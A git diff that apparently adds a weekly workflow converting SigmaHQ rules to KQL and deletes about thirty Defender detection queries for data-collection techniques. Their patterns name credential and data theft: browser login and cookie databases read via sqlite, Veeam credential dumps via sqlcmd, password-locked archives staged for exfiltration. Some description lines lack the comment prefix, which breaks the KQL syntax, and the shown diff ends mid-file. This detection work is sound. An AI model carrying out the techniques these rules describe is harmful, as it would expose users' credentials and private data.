diff --git a/.github/workflows/update-sigma-rules.yml b/.github/workflows/update-sigma-rules.yml
new file mode 100644
index 00000000..6061f485
--- /dev/null
+++ b/.github/workflows/update-sigma-rules.yml
@@ -0,0 +1,84 @@
+name: Update Sigma to KQL Rules
+
+on:
+  schedule:
+    # Run weekly on Sunday at 2 AM UTC
+    - cron: '0 2 * * 0'
+  workflow_dispatch:
+    # Allow manual trigger
+
+jobs:
+  convert-sigma-rules:
+    runs-on: ubuntu-latest
+    
+    steps:
+      - name: Checkout Sigma2KQL repository
+        uses: actions/checkout@v4
+        with:
+          token: ${{ secrets.GITHUB_TOKEN }}
+          fetch-depth: 0
+
+      - name: Set up Python
+        uses: actions/setup-python@v5
+        with:
+          python-version: '3.11'
+          cache: 'pip'
+
+      - name: Clone Sigma rules repository
+        run: |
+          git clone https://github.com/SigmaHQ/sigma.git
+
+      - name: Install Python dependencies
+        run: |
+          pip install -r requirements.txt
+
+      - name: Run Sigma to KQL conversion
+        run: |
+          python helper.py --sigma-dir "./sigma" --output-dir "./KQL"
+
+      - name: Check for changes
+        id: check_changes
+        run: |
+          git diff --quiet KQL/ || echo "changes=true" >> $GITHUB_OUTPUT
+
+      - name: Create Pull Request
+        if: steps.check_changes.outputs.changes == 'true'
+        uses: peter-evans/create-pull-request@v6
+        with:
+          token: ${{ secrets.GITHUB_TOKEN }}
+          commit-message: 'chore: update KQL rules from latest Sigma rules'
+          branch: update-sigma-rules-${{ github.run_number }}
+          delete-branch: true
+          title: 'Update KQL Rules from Sigma Repository'
+          body: |
+            ## Automated Sigma to KQL Conversion
+            
+            This PR contains updated KQL rules converted from the latest Sigma rules repository.
+            
+            ### Changes
+            - Updated KQL rules from SigmaHQ/sigma repository
+            - Conversion date: ${{ github.event.repository.updated_at }}
+            - Workflow run: ${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}
+            
+            ### Review Checklist
+            - [ ] Review changed rules for accuracy
+            - [ ] Verify new rules are properly formatted
+            - [ ] Check for any failed conversions in workflow logs
+            
+            ---
+            *This PR was automatically created by the Update Sigma Rules workflow.*
+          labels: |
+            automated
+            sigma-update
+          reviewers: ${{ github.repository_owner }}
+
+      - name: Summary
+        if: steps.check_changes.outputs.changes == 'true'
+        run: |
+          echo "✅ Pull request created with updated Sigma rules"
+          echo "📊 Check the PR for detailed changes"
+        
+      - name: No changes summary
+        if: steps.check_changes.outputs.changes != 'true'
+        run: |
+          echo "ℹ️ No changes detected - rules are up to date"
diff --git a/Collection/7Zip_Compressing_Dump_Files.kql b/Collection/7Zip_Compressing_Dump_Files.kql
deleted file mode 100644
index daeee759..00000000
--- a/Collection/7Zip_Compressing_Dump_Files.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/27
-// Level: medium
-// Description: Detects execution of 7z in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.
-// Tags: attack.collection, attack.t1560.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".dmp" or ProcessCommandLine contains ".dump" or ProcessCommandLine contains ".hdmp") and (ProcessVersionInfoFileDescription contains "7-Zip" or (FolderPath endswith "\\7z.exe" or FolderPath endswith "\\7zr.exe" or FolderPath endswith "\\7za.exe") or (ProcessVersionInfoOriginalFileName in~ ("7z.exe", "7za.exe")))
\ No newline at end of file
diff --git a/Collection/Audio_Capture_via_PowerShell.kql b/Collection/Audio_Capture_via_PowerShell.kql
deleted file mode 100644
index b1de4d13..00000000
--- a/Collection/Audio_Capture_via_PowerShell.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/10/24
-// Level: medium
-// Description: Detects audio capture via PowerShell Cmdlet.
-// Tags: attack.collection, attack.t1123
-DeviceProcessEvents
-| where ProcessCommandLine contains "WindowsAudioDevice-Powershell-Cmdlet" or ProcessCommandLine contains "Toggle-AudioDevice" or ProcessCommandLine contains "Get-AudioDevice " or ProcessCommandLine contains "Set-AudioDevice " or ProcessCommandLine contains "Write-AudioDevice "
\ No newline at end of file
diff --git a/Collection/Audio_Capture_via_SoundRecorder.kql b/Collection/Audio_Capture_via_SoundRecorder.kql
deleted file mode 100644
index 5dcbdbbf..00000000
--- a/Collection/Audio_Capture_via_SoundRecorder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
-// Date: 2019/10/24
-// Level: medium
-// Description: Detect attacker collecting audio via SoundRecorder application.
-// Tags: attack.collection, attack.t1123
-DeviceProcessEvents
-| where ProcessCommandLine contains "/FILE" and FolderPath endswith "\\SoundRecorder.exe"
\ No newline at end of file
diff --git a/Collection/Automated_Collection_Command_Prompt.kql b/Collection/Automated_Collection_Command_Prompt.kql
deleted file mode 100644
index 9f680167..00000000
--- a/Collection/Automated_Collection_Command_Prompt.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/07/28
-// Level: medium
-// Description: Once established within a system or network, an adversary may use automated techniques for collecting internal data.
-// Tags: attack.collection, attack.t1119, attack.credential_access, attack.t1552.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".docx" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".xlsx" or ProcessCommandLine contains ".ppt" or ProcessCommandLine contains ".pptx" or ProcessCommandLine contains ".rtf" or ProcessCommandLine contains ".pdf" or ProcessCommandLine contains ".txt") and ((ProcessCommandLine contains "dir " and ProcessCommandLine contains " /b " and ProcessCommandLine contains " /s ") or ((ProcessCommandLine contains " /e " or ProcessCommandLine contains " /si ") and ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE"))
\ No newline at end of file
diff --git a/Collection/Compress_Data_and_Lock_With_Password_for_Exfiltration_With_7-ZIP.kql b/Collection/Compress_Data_and_Lock_With_Password_for_Exfiltration_With_7-ZIP.kql
deleted file mode 100644
index b639138c..00000000
--- a/Collection/Compress_Data_and_Lock_With_Password_for_Exfiltration_With_7-ZIP.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/07/27
-// Level: medium
-// Description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities
-// Tags: attack.collection, attack.t1560.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " a " or ProcessCommandLine contains " u ") and (ProcessVersionInfoFileDescription contains "7-Zip" or (FolderPath endswith "\\7z.exe" or FolderPath endswith "\\7zr.exe" or FolderPath endswith "\\7za.exe") or (ProcessVersionInfoOriginalFileName in~ ("7z.exe", "7za.exe"))) and ProcessCommandLine contains " -p"
\ No newline at end of file
diff --git a/Collection/Compress_Data_and_Lock_With_Password_for_Exfiltration_With_WINZIP.kql b/Collection/Compress_Data_and_Lock_With_Password_for_Exfiltration_With_WINZIP.kql
deleted file mode 100644
index 70970441..00000000
--- a/Collection/Compress_Data_and_Lock_With_Password_for_Exfiltration_With_WINZIP.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/07/27
-// Level: medium
-// Description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities
-// Tags: attack.collection, attack.t1560.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -min " or ProcessCommandLine contains " -a ") and ProcessCommandLine contains "-s\"" and (ProcessCommandLine contains "winzip.exe" or ProcessCommandLine contains "winzip64.exe")
\ No newline at end of file
diff --git a/Collection/Compressed_File_Creation_Via_Tar.EXE.kql b/Collection/Compressed_File_Creation_Via_Tar.EXE.kql
deleted file mode 100644
index c32def88..00000000
--- a/Collection/Compressed_File_Creation_Via_Tar.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), AdmU3
-// Date: 2023/12/19
-// Level: low
-// Description: Detects execution of "tar.exe" in order to create a compressed file.
-Adversaries may abuse various utilities to compress or encrypt data before exfiltration.
-
-// Tags: attack.collection, attack.exfiltration, attack.t1560, attack.t1560.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-c" or ProcessCommandLine contains "-r" or ProcessCommandLine contains "-u") and (FolderPath endswith "\\tar.exe" or ProcessVersionInfoOriginalFileName =~ "bsdtar")
\ No newline at end of file
diff --git a/Collection/Compressed_File_Extraction_Via_Tar.EXE.kql b/Collection/Compressed_File_Extraction_Via_Tar.EXE.kql
deleted file mode 100644
index f02eb771..00000000
--- a/Collection/Compressed_File_Extraction_Via_Tar.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: AdmU3
-// Date: 2023/12/19
-// Level: low
-// Description: Detects execution of "tar.exe" in order to extract compressed file.
-Adversaries may abuse various utilities in order to decompress data to avoid detection.
-
-// Tags: attack.collection, attack.exfiltration, attack.t1560, attack.t1560.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "-x" and (FolderPath endswith "\\tar.exe" or ProcessVersionInfoOriginalFileName =~ "bsdtar")
\ No newline at end of file
diff --git a/Collection/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql b/Collection/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql
deleted file mode 100644
index 2846d8ff..00000000
--- a/Collection/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali
-// Date: 2019/12/30
-// Level: medium
-// Description: Detects a copy command or a copy utility execution to or from an Admin share or remote
-// Tags: attack.lateral_movement, attack.collection, attack.exfiltration, attack.t1039, attack.t1048, attack.t1021.002
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "\\" and ProcessCommandLine contains "$") or ProcessCommandLine contains "\\Sysvol\\") and (((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or (ProcessCommandLine contains "copy" and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains "copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp " or ProcessCommandLine contains "move " or ProcessCommandLine contains "move-item" or ProcessCommandLine contains " mi " or ProcessCommandLine contains " mv ") and ((FolderPath contains "\\powershell.exe" or FolderPath contains "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))))
\ No newline at end of file
diff --git a/Collection/CredUI.DLL_Loaded_By_Uncommon_Process.kql b/Collection/CredUI.DLL_Loaded_By_Uncommon_Process.kql
deleted file mode 100644
index 0fb4879a..00000000
--- a/Collection/CredUI.DLL_Loaded_By_Uncommon_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/10/20
-// Level: medium
-// Description: Detects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW".
-// Tags: attack.credential_access, attack.collection, attack.t1056.002
-DeviceImageLoadEvents
-| where ((FolderPath endswith "\\credui.dll" or FolderPath endswith "\\wincredui.dll") or (InitiatingProcessVersionInfoOriginalFileName in~ ("credui.dll", "wincredui.dll"))) and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe", "C:\\Windows\\regedit.exe")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))) and (not(((InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and InitiatingProcessFolderPath startswith "C:\\Users\\") or InitiatingProcessFolderPath endswith "\\opera_autoupdate.exe" or (InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\Teams\\" and InitiatingProcessFolderPath endswith "\\Teams.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\"))))
\ No newline at end of file
diff --git a/Collection/Data_Copied_To_Clipboard_Via_Clip.EXE.kql b/Collection/Data_Copied_To_Clipboard_Via_Clip.EXE.kql
deleted file mode 100644
index 11c993e5..00000000
--- a/Collection/Data_Copied_To_Clipboard_Via_Clip.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/07/27
-// Level: low
-// Description: Detects the execution of clip.exe in order to copy data to the clipboard. Adversaries may collect data stored in the clipboard from users copying information within or between applications.
-// Tags: attack.collection, attack.t1115
-DeviceProcessEvents
-| where FolderPath endswith "\\clip.exe" or ProcessVersionInfoOriginalFileName =~ "clip.exe"
\ No newline at end of file
diff --git a/Collection/Esentutl_Steals_Browser_Information.kql b/Collection/Esentutl_Steals_Browser_Information.kql
deleted file mode 100644
index 11258b4a..00000000
--- a/Collection/Esentutl_Steals_Browser_Information.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/02/13
-// Level: medium
-// Description: One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe
-// Tags: attack.collection, attack.t1005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-r" or ProcessCommandLine contains "/r") and (FolderPath endswith "\\esentutl.exe" or ProcessVersionInfoOriginalFileName =~ "esentutl.exe") and ProcessCommandLine contains "\\Windows\\WebCache"
\ No newline at end of file
diff --git a/Collection/Exchange_PowerShell_Snap-Ins_Usage.kql b/Collection/Exchange_PowerShell_Snap-Ins_Usage.kql
deleted file mode 100644
index 32eb0763..00000000
--- a/Collection/Exchange_PowerShell_Snap-Ins_Usage.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/03/03
-// Level: high
-// Description: Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27
-// Tags: attack.execution, attack.t1059.001, attack.collection, attack.t1114
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Add-PSSnapin" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "Microsoft.Exchange.Powershell.Snapin" or ProcessCommandLine contains "Microsoft.Exchange.Management.PowerShell.SnapIn")) and (not((ProcessCommandLine contains "$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\msiexec.exe")))
\ No newline at end of file
diff --git a/Collection/Files_Added_To_An_Archive_Using_Rar.EXE.kql b/Collection/Files_Added_To_An_Archive_Using_Rar.EXE.kql
deleted file mode 100644
index 892b79db..00000000
--- a/Collection/Files_Added_To_An_Archive_Using_Rar.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Timur Zinniatullin, E.M. Anhaus, oscd.community
-// Date: 2019/10/21
-// Level: low
-// Description: Detects usage of "rar" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
-// Tags: attack.collection, attack.t1560.001
-DeviceProcessEvents
-| where ProcessCommandLine contains " a " and FolderPath endswith "\\rar.exe"
\ No newline at end of file
diff --git a/Collection/Folder_Compress_To_Potentially_Suspicious_Output_Via_Compress-Archive_Cmdlet.kql b/Collection/Folder_Compress_To_Potentially_Suspicious_Output_Via_Compress-Archive_Cmdlet.kql
deleted file mode 100644
index b13cc722..00000000
--- a/Collection/Folder_Compress_To_Potentially_Suspicious_Output_Via_Compress-Archive_Cmdlet.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), frack113
-// Date: 2021/07/20
-// Level: medium
-// Description: Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration.
-An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
-
-// Tags: attack.collection, attack.t1074.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Compress-Archive -Path" and ProcessCommandLine contains "-DestinationPath $env:TEMP") or (ProcessCommandLine contains "Compress-Archive -Path" and ProcessCommandLine contains "-DestinationPath" and ProcessCommandLine contains "\\AppData\\Local\\Temp\\") or (ProcessCommandLine contains "Compress-Archive -Path" and ProcessCommandLine contains "-DestinationPath" and ProcessCommandLine contains ":\\Windows\\Temp\\")
\ No newline at end of file
diff --git a/Collection/PUA_-_Mouse_Lock_Execution.kql b/Collection/PUA_-_Mouse_Lock_Execution.kql
deleted file mode 100644
index cad3d884..00000000
--- a/Collection/PUA_-_Mouse_Lock_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Cian Heasley
-// Date: 2020/08/13
-// Level: medium
-// Description: In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool "Mouse Lock" as being used for both credential access and collection in security incidents.
-// Tags: attack.credential_access, attack.collection, attack.t1056.002
-DeviceProcessEvents
-| where ProcessVersionInfoProductName contains "Mouse Lock" or ProcessVersionInfoCompanyName contains "Misc314" or ProcessCommandLine contains "Mouse Lock_"
\ No newline at end of file
diff --git a/Collection/Password_Protected_Compressed_File_Extraction_Via_7Zip.kql b/Collection/Password_Protected_Compressed_File_Extraction_Via_7Zip.kql
deleted file mode 100644
index 7a27616d..00000000
--- a/Collection/Password_Protected_Compressed_File_Extraction_Via_7Zip.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/10
-// Level: medium
-// Description: Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files.
-// Tags: attack.collection, attack.t1560.001
-DeviceProcessEvents
-| where (ProcessVersionInfoFileDescription contains "7-Zip" or (FolderPath endswith "\\7z.exe" or FolderPath endswith "\\7zr.exe" or FolderPath endswith "\\7za.exe") or (ProcessVersionInfoOriginalFileName in~ ("7z.exe", "7za.exe"))) and (ProcessCommandLine contains " -p" and ProcessCommandLine contains " x " and ProcessCommandLine contains " -o")
\ No newline at end of file
diff --git a/Collection/PowerShell_Get-Clipboard_Cmdlet_Via_CLI.kql b/Collection/PowerShell_Get-Clipboard_Cmdlet_Via_CLI.kql
deleted file mode 100644
index 754c2e8e..00000000
--- a/Collection/PowerShell_Get-Clipboard_Cmdlet_Via_CLI.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/05/02
-// Level: medium
-// Description: Detects usage of the 'Get-Clipboard' cmdlet via CLI
-// Tags: attack.collection, attack.t1115
-DeviceProcessEvents
-| where ProcessCommandLine contains "Get-Clipboard"
\ No newline at end of file
diff --git a/Collection/Rar_Usage_with_Password_and_Compression_Level.kql b/Collection/Rar_Usage_with_Password_and_Compression_Level.kql
deleted file mode 100644
index eb0b2acf..00000000
--- a/Collection/Rar_Usage_with_Password_and_Compression_Level.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @ROxPinTeddy
-// Date: 2020/05/12
-// Level: high
-// Description: Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.
-// Tags: attack.collection, attack.t1560.001
-DeviceProcessEvents
-| where ProcessCommandLine contains " -hp" and (ProcessCommandLine contains " -m" or ProcessCommandLine contains " a ")
\ No newline at end of file
diff --git a/Collection/Recon_Information_for_Export_with_Command_Prompt.kql b/Collection/Recon_Information_for_Export_with_Command_Prompt.kql
deleted file mode 100644
index 63bb9dd0..00000000
--- a/Collection/Recon_Information_for_Export_with_Command_Prompt.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/07/30
-// Level: medium
-// Description: Once established within a system or network, an adversary may use automated techniques for collecting internal data.
-// Tags: attack.collection, attack.t1119
-DeviceProcessEvents
-| where ((FolderPath endswith "\\tree.com" or FolderPath endswith "\\WMIC.exe" or FolderPath endswith "\\doskey.exe" or FolderPath endswith "\\sc.exe") or (ProcessVersionInfoOriginalFileName in~ ("wmic.exe", "DOSKEY.EXE", "sc.exe"))) and (InitiatingProcessCommandLine contains " > %TEMP%\\" or InitiatingProcessCommandLine contains " > %TMP%\\")
\ No newline at end of file
diff --git a/Collection/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql b/Collection/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql
deleted file mode 100644
index 6b0bdff3..00000000
--- a/Collection/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/19
-// Level: medium
-// Description: Detects execution of renamed Remote Utilities (RURAT) via Product PE header field
-// Tags: attack.defense_evasion, attack.collection, attack.command_and_control, attack.discovery, attack.s0592
-DeviceProcessEvents
-| where ProcessVersionInfoProductName =~ "Remote Utilities" and (not((FolderPath endswith "\\rutserv.exe" or FolderPath endswith "\\rfusclient.exe")))
\ No newline at end of file
diff --git a/Collection/SQLite_Chromium_Profile_Data_DB_Access.kql b/Collection/SQLite_Chromium_Profile_Data_DB_Access.kql
deleted file mode 100644
index 630b3df1..00000000
--- a/Collection/SQLite_Chromium_Profile_Data_DB_Access.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: TropChaud
-// Date: 2022/12/19
-// Level: high
-// Description: Detect usage of the "sqlite" binary to query databases in Chromium-based browsers for potential data stealing.
-// Tags: attack.credential_access, attack.t1539, attack.t1555.003, attack.collection, attack.t1005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\User Data\\" or ProcessCommandLine contains "\\Opera Software\\" or ProcessCommandLine contains "\\ChromiumViewer\\") and (ProcessCommandLine contains "Login Data" or ProcessCommandLine contains "Cookies" or ProcessCommandLine contains "Web Data" or ProcessCommandLine contains "History" or ProcessCommandLine contains "Bookmarks") and (ProcessVersionInfoProductName =~ "SQLite" or (FolderPath endswith "\\sqlite.exe" or FolderPath endswith "\\sqlite3.exe"))
\ No newline at end of file
diff --git a/Collection/SQLite_Firefox_Profile_Data_DB_Access.kql b/Collection/SQLite_Firefox_Profile_Data_DB_Access.kql
deleted file mode 100644
index fbc2f1fc..00000000
--- a/Collection/SQLite_Firefox_Profile_Data_DB_Access.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/04/08
-// Level: high
-// Description: Detect usage of the "sqlite" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.
-// Tags: attack.credential_access, attack.t1539, attack.collection, attack.t1005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "cookies.sqlite" or ProcessCommandLine contains "places.sqlite") and (ProcessVersionInfoProductName =~ "SQLite" or (FolderPath endswith "\\sqlite.exe" or FolderPath endswith "\\sqlite3.exe"))
\ No newline at end of file
diff --git a/Collection/Screen_Capture_Activity_Via_Psr.EXE.kql b/Collection/Screen_Capture_Activity_Via_Psr.EXE.kql
deleted file mode 100644
index c38fcb0e..00000000
--- a/Collection/Screen_Capture_Activity_Via_Psr.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Beyu Denis, oscd.community
-// Date: 2019/10/12
-// Level: medium
-// Description: Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks.
-// Tags: attack.collection, attack.t1113
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/start" or ProcessCommandLine contains "-start") and FolderPath endswith "\\Psr.exe"
\ No newline at end of file
diff --git a/Collection/Suspicious_Camera_and_Microphone_Access.kql b/Collection/Suspicious_Camera_and_Microphone_Access.kql
deleted file mode 100644
index 02e3f749..00000000
--- a/Collection/Suspicious_Camera_and_Microphone_Access.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Den Iuzvyk
-// Date: 2020/06/07
-// Level: high
-// Description: Detects Processes accessing the camera and microphone from suspicious folder
-// Tags: attack.collection, attack.t1125, attack.t1123
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\ConsentStore" and RegistryKey contains "\\NonPackaged") and (RegistryKey contains "microphone" or RegistryKey contains "webcam") and (RegistryKey contains ":#Windows#Temp#" or RegistryKey contains ":#$Recycle.bin#" or RegistryKey contains ":#Temp#" or RegistryKey contains ":#Users#Public#" or RegistryKey contains ":#Users#Default#" or RegistryKey contains ":#Users#Desktop#")
\ No newline at end of file
diff --git a/Collection/Suspicious_Manipulation_Of_Default_Accounts_Via_Net.EXE.kql b/Collection/Suspicious_Manipulation_Of_Default_Accounts_Via_Net.EXE.kql
deleted file mode 100644
index 89728d30..00000000
--- a/Collection/Suspicious_Manipulation_Of_Default_Accounts_Via_Net.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/01
-// Level: high
-// Description: Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc
-// Tags: attack.collection, attack.t1560.001
-DeviceProcessEvents
-| where (((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) and ProcessCommandLine contains " user " and (ProcessCommandLine contains " Järjestelmänvalvoja " or ProcessCommandLine contains " Rendszergazda " or ProcessCommandLine contains " Администратор " or ProcessCommandLine contains " Administrateur " or ProcessCommandLine contains " Administrador " or ProcessCommandLine contains " Administratör " or ProcessCommandLine contains " Administrator " or ProcessCommandLine contains " guest " or ProcessCommandLine contains " DefaultAccount " or ProcessCommandLine contains " \"Järjestelmänvalvoja\" " or ProcessCommandLine contains " \"Rendszergazda\" " or ProcessCommandLine contains " \"Администратор\" " or ProcessCommandLine contains " \"Administrateur\" " or ProcessCommandLine contains " \"Administrador\" " or ProcessCommandLine contains " \"Administratör\" " or ProcessCommandLine contains " \"Administrator\" " or ProcessCommandLine contains " \"guest\" " or ProcessCommandLine contains " \"DefaultAccount\" " or ProcessCommandLine contains " 'Järjestelmänvalvoja' " or ProcessCommandLine contains " 'Rendszergazda' " or ProcessCommandLine contains " 'Администратор' " or ProcessCommandLine contains " 'Administrateur' " or ProcessCommandLine contains " 'Administrador' " or ProcessCommandLine contains " 'Administratör' " or ProcessCommandLine contains " 'Administrator' " or ProcessCommandLine contains " 'guest' " or ProcessCommandLine contains " 'DefaultAccount' ")) and (not((ProcessCommandLine contains "guest" and ProcessCommandLine contains "/active no")))
\ No newline at end of file
diff --git a/Collection/VeeamBackup_Database_Credentials_Dump_Via_Sqlcmd.EXE.kql b/Collection/VeeamBackup_Database_Credentials_Dump_Via_Sqlcmd.EXE.kql
deleted file mode 100644
index 4a238404..00000000
--- a/Collection/VeeamBackup_Database_Credentials_Dump_Via_Sqlcmd.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/12/20
-// Level: high
-// Description: Detects dump of credentials in VeeamBackup dbo
-// Tags: attack.collection, attack.t1005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "SELECT" and ProcessCommandLine contains "TOP" and ProcessCommandLine contains "[VeeamBackup].[dbo].[Credentials]") and FolderPath endswith "\\sqlcmd.exe"
\ No newline at end of file
diff --git a/Collection/Veeam_Backup_Database_Suspicious_Query.kql b/Collection/Veeam_Backup_Database_Suspicious_Query.kql
deleted file mode 100644
index f4765f5e..00000000
--- a/Collection/Veeam_Backup_Database_Suspicious_Query.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/04
-// Level: medium
-// Description: Detects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information.
-// Tags: attack.collection, attack.t1005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "BackupRepositories" or ProcessCommandLine contains "Backups" or ProcessCommandLine contains "Credentials" or ProcessCommandLine contains "HostCreds" or ProcessCommandLine contains "SmbFileShares" or ProcessCommandLine contains "Ssh_creds" or ProcessCommandLine contains "VSphereInfo") and ((ProcessCommandLine contains "VeeamBackup" and ProcessCommandLine contains "From ") and FolderPath endswith "\\sqlcmd.exe")
\ No newline at end of file
diff --git a/Collection/Windows_Recall_Feature_Enabled_-_DisableAIDataAnalysis_Value_Deleted.kql b/Collection/Windows_Recall_Feature_Enabled_-_DisableAIDataAnalysis_Value_Deleted.kql
deleted file mode 100644
index c4ab53b9..00000000
--- a/Collection/Windows_Recall_Feature_Enabled_-_DisableAIDataAnalysis_Value_Deleted.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Sajid Nawaz Khan
-// Date: 2024/06/02
-// Level: medium
-// Description: Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" registry value.
-Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.
-This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
-
-// Tags: attack.collection, attack.t1113
-DeviceRegistryEvents
